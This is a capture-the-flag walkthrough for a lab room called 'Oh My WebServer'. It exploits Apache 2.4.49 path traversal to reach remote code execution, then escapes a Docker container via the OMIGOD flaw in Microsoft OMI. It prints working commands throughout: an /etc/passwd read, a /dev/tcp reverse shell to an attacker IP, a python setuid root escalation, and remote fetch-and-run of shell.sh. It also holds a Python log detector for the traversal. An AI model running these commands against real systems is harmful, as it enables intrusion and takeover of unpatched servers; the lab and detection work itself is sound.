# Oh My WebServer

## Nmap

```
nmap 10.10.170.23 -p- -Pn -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting with port 80, we arrive at the root page for CONSUULT.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmEIxlIEALhDIeoCZNAAs%2Fimage.png?alt=media\&token=8f6fcbf8-6774-4bd3-b179-0703629638ed)

Running a web application scan with `Nessus` against the target web server shows the running version of Apache is vulnerable to a critical exploit.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXN28MiDIZ6IQcfI8htdf%2Fimage.png?alt=media\&token=3d15336b-1af3-4d53-bc9f-85e7ec0f8d0f)

More details regarding the Path Traversal vulnerability are shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FsVlTuIMoocIqiHqMGhva%2Fimage.png?alt=media\&token=5b3d0ca4-83d2-405b-ae00-3d9075af382a)

Researching publicly available exploits we find a bash script available on Exploit-db.

**Exploit-db:** <https://www.exploit-db.com/exploits/50383>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2xpdf0LuK5xtDzIuQHCq%2Fimage.png?alt=media\&token=bff52810-af3c-4caa-ac29-2b895df0f5b1)

We can condense the main part of the script into a single command in order to exploit the target system, as shown below; with it we are able to read the contents of `/etc/passwd`.

```
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; cat /etc/passwd" "http://10.10.157.208/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGxuAhXlwkHCBiLbLEC6I%2Fimage.png?alt=media\&token=47628339-6edc-4521-9268-89fc8cfb5c79)

To make further exploitation easier, we can send the curl request through a local proxy (Burp Suite) in order to capture and modify the request.

```
curl -x localhost:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; " "http://10.10.82.103/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash"
```

```
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1
Host: 10.10.82.103
User-Agent: curl/7.82.0
Accept: */*
Content-Length: 52
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; cat /etc/passwd
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2H1TJH19sVuaSrHUCF8s%2Fimage.png?alt=media\&token=b3dcd181-057d-43b7-a64a-29179b01048d)

We can manipulate this request to receive a reverse shell.

```
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1
Host: 10.10.82.103
User-Agent: curl/7.82.0
Accept: */*
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.8.239.254/4444 0>&1
```
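The two captured requests above share one shape: percent-encoded dot segments under `/cgi-bin/` that the Apache 2.4.49 normalizer failed to fold, followed by a path that walks above the document root. The detector below is an added example, not part of the original writeup; it parses constructed Apache access-log lines (the addresses and timestamps are made up) and flags the encoded-dot bypass, traversal above the root, and a shell binary reached through `cgi-bin`. It also handles double-encoding (`%252e`), which the page does not show.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (not from the target in this writeup); the
# two /cgi-bin/ entries mimic the encoded-dot traversal requests shown above.
SAMPLE_LOG = [
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2071',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /static/..%252f..%252fetc/passwd HTTP/1.1" 404 196',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /docs/./guide/../intro.html HTTP/1.1" 200 8000',
]
# Client address plus the logged request line ("METHOD path HTTP/x.y").
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def decode_path(raw_path, rounds=3):
    # Bounded repeated percent-decoding so double-encoded %252e is unmasked too.
    path = raw_path
    for _ in range(rounds):
        path, prev = unquote(path), path
        if path == prev:
            break
    return path

def escapes_root(decoded_path):
    # Walk the segments; any '..' that steps above the URL root is a traversal.
    depth = 0
    for seg in decoded_path.split("?", 1)[0].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def analyze_line(line):
    # Return a finding dict for a suspicious request, or None for a benign one.
    m = REQUEST_RE.match(line)
    if not m:
        return None
    raw, reasons = m.group("path"), []
    decoded = decode_path(raw)
    if "%2e" in raw.lower():
        reasons.append("percent-encoded dot")  # what 2.4.49's normalizer failed to fold
    if escapes_root(decoded):
        reasons.append("traversal above root")
    if decoded.startswith("/cgi-bin/") and re.search(r"/bin/(ba)?sh$", decoded):
        reasons.append("shell reached via cgi-bin")  # the RCE shape when mod_cgi is on
    return {"client": m.group("client"), "method": m.group("method"),
            "decoded": decoded, "reasons": reasons} if reasons else None
```

Running `analyze_line` over each entry of `SAMPLE_LOG` flags the first three requests and leaves the in-bounds `/docs/./guide/../intro.html` request alone.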

As shown below:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FMmr51shHfQhZFbYdDdpQ%2Fimage.png?alt=media\&token=c91b53dc-3d08-4733-877c-59fb2a9551cd)

From here we find that python3 is installed on the target system, so we use it to spawn a proper PTY shell.

```
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Performing basic enumeration on the target system, we find that its IP address does not match the room's.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbSPxsHI4fTyHPT5ad8y7%2Fimage.png?alt=media\&token=5aae1ffb-096f-4841-bfa7-b1c1fa1d0202)

We also find a pretty telling `.dockerenv` file in `/`. Combined with the system hostname, these facts let us safely assume we are working within a Docker container.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqRZQhScG22lcValF3AwW%2Fimage.png?alt=media\&token=39b6dbfa-7ea1-482e-8afa-4f33b5abb0e3)

For further enumeration, `linpeas.sh` was downloaded onto the target system.

```
curl http://10.8.239.254/linpeas.sh --output linpeas.sh
```

After executing `linpeas.sh` we see that the current user can escalate privileges through the file capabilities set on `python3.7`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbNZdcGb1f7fQaiQ8xqWc%2Fimage.png?alt=media\&token=f35757c6-2742-4d2c-965d-babc728d47b7)

The following command can be used to escalate to **root** within the Docker container.

```
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FID5PvFyNPTNPg6FNfRDd%2Fimage.png?alt=media\&token=dbf14ce9-1bd1-419d-bf5b-860443b063fe)

From here, we are able to grab the `user.txt` flag from `/root/`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwNlb6gnpb8UkPrVrthWP%2Fimage.png?alt=media\&token=c5ea3f24-aec7-49c8-9cb4-668c4b48f243)

For further enumeration, a static `Nmap` binary was uploaded to the target system.

**Github:** <https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap>

```
./nmap 172.17.0.1 -p 1-10000 -sS -v
```

As the current container is running on 172.17.0.2, we check 172.17.0.1 and find that it is running something on port 5986.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdYbloQpHhn3GoZ4k1UyO%2Fimage.png?alt=media\&token=2a7d2bf9-07f3-4f0b-a4a7-cbc31c250524)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FnSmKaoksH1rp618zwxfj%2Fimage.png?alt=media\&token=677bd406-8912-4ddd-bb47-5c51864d5972)

Researching the port number we find that "OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft."

According to the resources linked below, this may be vulnerable to CVE-2021-38647, which could allow us to perform remote code execution on the host 172.17.0.1.

**BookHackTricks:** <https://book.hacktricks.xyz/pentesting/5985-5986-pentesting-omi>

**CVE:** <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>

**Blog:** <https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/>

**GitHub:** <https://github.com/horizon3ai/CVE-2021-38647>

Download the GitHub Python script linked above onto the target system.

```
curl http://10.8.239.254/omigod.py --output omigod.py
```

Test for command execution:

```
python3 omigod.py -t 172.17.0.1 -c hostname
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FyZUYnSGv3dMwYNthbmy5%2Fimage.png?alt=media\&token=cbc99415-2ec2-4163-90eb-9ac11f7b1d8a)

We can then create a bash reverse shell file, `shell.sh`, on our attacking host and use the RCE on the 172.17.0.1 system to download and execute it.

```
python3 omigod.py -t 172.17.0.1 -c "curl http://10.8.239.254/shell.sh --output /tmp/shell.sh"
python3 omigod.py -t 172.17.0.1 -c "bash /tmp/shell.sh"
```

This gives us a root shell on the main host.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9c3RsejVHe0x0g56BErk%2Fimage.png?alt=media\&token=d5391c65-48b3-485e-8d7c-93630d0ca730)
